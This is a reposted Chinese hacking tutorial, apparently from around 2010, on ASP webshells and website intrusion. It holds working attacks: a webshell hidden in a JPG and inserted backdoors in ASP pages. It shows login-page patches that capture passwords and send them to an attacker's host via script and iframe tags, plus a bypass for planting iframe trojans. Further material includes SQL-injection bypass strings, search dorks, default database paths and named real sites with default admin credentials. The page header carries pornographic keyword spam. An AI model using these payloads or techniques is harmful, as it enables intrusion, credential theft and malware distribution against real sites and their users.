日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

asp木马常识综合

發布時間:2024/1/1 编程问答 27 豆豆
生活随笔 收集整理的這篇文章主要介紹了 asp木马常识综合 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

建一個asp文件,內容為 <!--#i nclude file="ating.jpg"-->
?找一個正常圖片ating.jpg,插入一句話木馬(比如冰狐的),用ultraedit進行hex編譯,插入圖片里,為了運行成功,還要搜索%和%,將其變為00,(不要替換自己asp的),再把jpg文件開頭加入

<SCRIPT RUNAT=SERVER LANGUAGE=JAVASCRIPT>eval(Request.form(#)+) </SCRIPT>
?2. 名稱:整蠱網吧

先用精銳網吧輔助工具得到用戶名和密碼,然后用計算機管理聯結一臺機器,開telnet,連接,開共享,復制一個木馬過去運行即可。 3.名稱:感受MD5暴力破解的魅力

rainbowcrack用法先用rtgen生成庫 "rtgen md5 byte 1 7 5 2400 40000 all"

1和7代表密碼最小和最大長度

阿汀我再加個方法:http://md5.rednoize.com/ 在線破解

或者到http://www.md5lookup.com/?category=01-3&searck=on


4.很多時候我們做免殺木馬,不用懂匯編,用北斗加殼程序就能逃殺,還有很多加殼軟件,大家木馬加殼的時候最好多選擇不知名的加殼軟件。


5.名稱:隱蔽的插入型ASP木馬

(1)在我們要做手腳的asp文件里加入如下內容

<%if request("action")="ok" then%>
?shell代碼插在這里,最好是小馬,還要加密一下 <%end if%>
?訪問的時候在你作手腳的asp文件后面加上?action=ok,即可

(2)另一種方法,在我們要做手腳的asp文件里加入如下內容

<%
on error resume next
strFileName = Request.QueryString("filer")
set objStream = Server.createObject("ABODB.Stream")
objStream.Type = 1
objStream.Open
objStream.LoadFromFile strFileName
objStream.SaveToFile Server.mappath("ating.asp"),2
%>
?訪問的時候在做手腳的asp文件后面加上?filer=XXX

XXX為你本地上傳的一個路徑如 c:ating123.asp

上傳后在做手腳的asp的同文件夾中有ating,asp


(3)前提得到system權限,進入網站目錄下一層

mkdir s…

copy ating.asp s…/

這樣殺毒軟件找不到的

訪問http://網站/s…/ating.asp即可。


6. 工具http://hack520.tengyi.cn/chaojiyonghu.rar,此工具在該電腦生成一個超級用戶

用戶名為:hack 密碼110,在DOS下和計算機管理器上看不到你建立的用戶,并且是刪除不掉的。

7.名稱:QQ群腳本攻擊

打開qq對話誆,復制消息,然后,下面的內容保存為.vbs 文件,運行即可。

?

Set WshShell= WScript.createobject("WScript.Shell")
WshShell.AppActivate "QQ信息攻擊腳本"
for i=1 to 20
WScript.Sleep 1000
WshShell.SendKeys"^v"
WshShell.SendKeys i
WshShell.SendKeys "%s"
Next
?


8.搜索:程序制作:萬鵬 有免費申請空間的,直接上傳asp馬即可。


9. 名稱:全面找出你站上的ASP木馬

(1) 用殺毒軟件

(2) 用FTP客戶端軟件,點"工具"->"比較文件夾"

(3) 用asplist2.0.asp上傳到站點空間查看,一般功能多的ASP我估計就是ASP木馬

(4) 用工具Beyond Compare


10名稱:拓展思路拿DVBBS帳號 "一個人的圣經"的動畫


(1)以前獲得webshell后想進入DVBBS的后臺,想要管理員的密碼,可以這樣,

老辦法:

修改admin_login.asp得到明文DVBBS后臺密碼

在"username=trim(replace(request("username")這行后面

?

Dim fsoObject
Dim tsObject
Set fsoObject = Server.createObject("Scripting.FileSystemObject")
set tsObject = fsoObject.createTextFile(Server.MapPath("laner.txt"))
tsObject.Write CStr(request("password"))
Set fsoObject = Nothing
Set tsObject = Nothing
?


只要管理員登陸后臺,在目錄下就生成了laner.txt。


(2)login.asp中Case "login_chk"下:

?

on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&request("username")&"text:"&request("password")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing
?


這樣laner.asp將獲得全部登陸人的登陸時間,用戶名和密碼。


(3)如果你有自己的網站或者另外的webshell(強烈建議使用): 可以建立目錄laner,在里面建立一個空的laner.asp和如下代碼的rain.asp:

?

<%if request("n")<>"" and request("p")<>"" then
on error resume next
Dim rain
set rain=server.createobject("adodb.stream")
rain.Type=2
rain.CharSet="gb2312"
rain.Position=rain.Size
rain.Open
rain.LoadFromFile server.MapPath("laner.asp")
rain.writetext now&"Name:"&request("n")&"Password:"&request("p")&chr(10)
rain.SaveToFile server.MapPath("laner.asp"),2
rain.Close
set rain=nothing
end if%>
?


11. 名稱:利用QQ在線狀態抓鴿子肉雞

生成qq在線狀態,把里面的地址改成木馬地址,發到論壇在login.asp那里插入一句:

?

response.write"<scriptsrc=http://www.ptlushi.com/laner/rain.asp?

n="&request("username")&""&"&p="&request("password")

&"></script>"response.write"<iframesrc=http://yourwebsite/laner/rain.asp?n="&request

("username")&""&"&p="&request("password")&"></iframe>"
?


結果所有登陸人都會乖乖的把名字和密碼送到你的laner.asp 里


12. 動畫名稱:媒體中國整站程序存在多處漏洞

漏洞程序:媒體中國整站程序(第一版)

官方網站:http://meiti.elgod.com/

漏洞: %5c(暴庫) 上傳 注入

上傳頁面:down1/upload.asp


13. 名稱:免費電話+MSH命令行工具

http://www.globe7.com/ 打開主頁,點擊坐下角,Free DownLoad,下載到本地,安裝,運行后,會提示正在尋找你所在地區的區號。由于是國際長途,注冊一個帳號,送100美分,國內計時0.01/分,你就有100分鐘可以白打。是一個帳號哦。

要注意的就是,固定電話,小靈通 形式為0086521123456 521本來時0521,要省略前面的零,手機號也是一樣。


14. 名稱:Bo-Blog的新漏洞

http://網址/index.php?job=../admin/ban

把其中"禁止搜索的詞"那部分另存出來,里面的地址改完整,插入一句話木馬

15. 名稱:鉤魂者入侵傳奇SiFu私服

用百度 搜索 傳奇 inurl:tuku

或者 傳奇 inurl:wplm.htm

再或者 傳奇 inurl:coolsites.asp

友情鏈接里插入一句話木馬即可


16. 程序: 宏達企業整站上傳漏洞

官方主頁:http://www.mu126.com/

漏洞頁面:/cx/upfile.asp (上傳漏洞)


17.無間盜郵箱,在修改密碼里,用戶名和密碼里添or=or


18.名稱: bbsxp5.16后臺得到webshell

bbsxp5.16過濾了 asp,asp,cdx,cer,擴展名的文件上傳,就是在基本設置上添加上上傳類型也不行,并禁止了修改數據備份數據名稱,我們可以把此網頁保存在本地,改源代碼上傳。


19.名稱:JHACKJ 2005年最新精典教程

下載看看吧,不錯,各大網站都有


20.名稱:省力入侵韓國肉雞

在啊D的掃描注入點項,打開這個:http://www.google.co.kr/advanced_search?hl=zh-CN

這是高級搜索項,關鍵字隨便寫。這里我寫asp?name= 設置為每頁顯示100條。

語種選擇韓文。搜索,很多sa.


21.名稱:任何網吧的管理系統破解

選智能ABC,然后vv輸入,光標后退兩步,按delete鍵 剛輸入的兩個vv刪除, 最后按Inter鍵。


22.名稱:破解QQ空間插入網頁木馬的代碼

現在騰訊已經封了很多QQ空間代碼了,就如以前


?<iframe src="木馬地址" name="lcx" width="0" height="0" frameborder="0"></iframe>
?

?

插入網頁木馬的代碼也早被封了,突破禁用的方法,代碼如下:

?

<div id=DI><img src="javascript :DI.innerHTML=\<iframe src=木馬地址

?width=190 height=190 marginwidth=0 marginheight=0 hspace=0 vspace=0 frameborder=0

scrolling=no></iframe>\" style=display:none></div>
?


最后附上總結的


1.上傳漏洞[不多講]

pS: 如果看到:選擇你要上傳的文件 [重新上傳]或者出現"請登陸后使用",80%就有漏洞了!

有時上傳不一定會成功,這是因為Cookies不一樣.我們就要用WSockExpert取得Cookies.再用DOMAIN上傳.


2.注入漏洞[不多講]

pS:對MD5密碼.有時我們不是哪么容易跑出來.如果是[SQL數據庫].那么我們可以用以下命令:

http://注入網址;update admin set password=\新MD5密碼\ where password=\舊MD5密碼\-- [admin為表名.]


3.旁注,也就是跨站.

我們入侵某站時可能這個站堅固的無懈可擊,我們可以找下和這個站同一服務器的站點,然后在利用這個站點用提權,嗅探等方法來入侵我們 要入侵的站點。,在這里有個難點,就是一些服務器的絕對路徑經過加密,這就看我們的本事了


4.暴庫:把二級目錄中間的/換成%5c

EY:http://www.ahttc.edu.cn/otherweb/dz/bgs/BigClass.asp?BigClassName=職責范圍&BigClassType=1

如果你能看到:\E:ahttc040901otherwebdzdatabaseiXuEr_Studio.asa\不是一個有效的路徑。 確定路徑名稱拼寫是否正確,以及是否 連接到文件存放的服務器。

這樣的就是數據庫了。下載時用FLASHGET換成.MDB格式的就行.


5.\or\=\or\這是一個可以連接SQL的語名句.可以直接進入后臺。我收集了一下。類似的還有:

\or\\=\ " or "a"="a \) or (\a\=\a ") or ("a"="a or 1=1-- \ or \a\=\a


6.社會工程學。這個我們都知道吧。就是猜解。

 EY:http://www.neu.edu.cn/waishi/admin

admin waishi


7.寫入ASP格式數據庫。就是一句話木馬[ ],常用在留言本.

EY:http://www.ahsdxy.ah.edu.cn/ebook/db/ebook.asp[這個就是ASP格式的數據庫],再寫入一句話木馬


8.源碼利用:一些網站用的都是網上下載的源碼.有的站長很菜.什么也不改.

EY:http://www.ahsdxy.ah.edu.cn/xiaoyoulu/index.asp

這個站用的是:杰出校友錄,源碼我下過了,

默認數據庫/webshell路徑:databaseliangu_data.mdb 后臺管理:adm_login.asp 密碼及用戶名都是admin


9.默認數據庫/webshell路徑利用:這樣的網站很多/利人別人的WEBSHELL.

?

/Databackup/dvbbs7.MDB
/bbs/Databackup/dvbbs7.MDB
/bbs/Data/dvbbs7.MDB
/data/dvbbs7.mdb
/bbs/diy.asp
/diy.asp
/bbs/cmd.asp
/bbs/cmd.exe
/bbs/s-u.exe
/bbs/servu.exe
?


工具:網站獵手 挖掘雞

EY:http://www.cl1999.com/bbs/Databackup/dvbbs7.MDB


10.查看目錄法:人一些網站可以斷開目錄,可以方問目錄。

EY:http://www.ujs168.com/shop/admin/

http://escolourfvl.com/babyfox/admin/%23bb%23dedsed2s/

這樣我們可以找到數據庫,下載不用我教吧


11.工具溢出:.asp?NewsID= /2j.asp?id=18 .asp?id=[這種方法可以取得大量的WEBSHELL]


12.搜索引擎利用:

(1).inurl:flasher_list.asp 默認數據庫:database/flash.mdb 后臺/manager/

(2).找網站的管理后臺地址:

site:xxxx.comintext:管理

site:xxxx.comintitle:管理 <關鍵字很多,自已找>

site:xxxx.cominurl:login

(3).查找access的數據庫,mssql、mysql的連接文件

allinurl:bbsdata

filetype:mdbinurl:database

filetype:incconn

inurl:datafiletype:mdb

我主不做了。。自已做做吧。。


13.COOKIE欺騙:

把自己的ID修改成管理員的,MD5密碼也修改成他的,用桂林老兵工具可以修改COOKIE。這個我就不多講了

轉載于:https://www.cnblogs.com/qingshan/archive/2010/01/07/1641561.html

總結

以上是生活随笔為你收集整理的asp木马常识综合的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。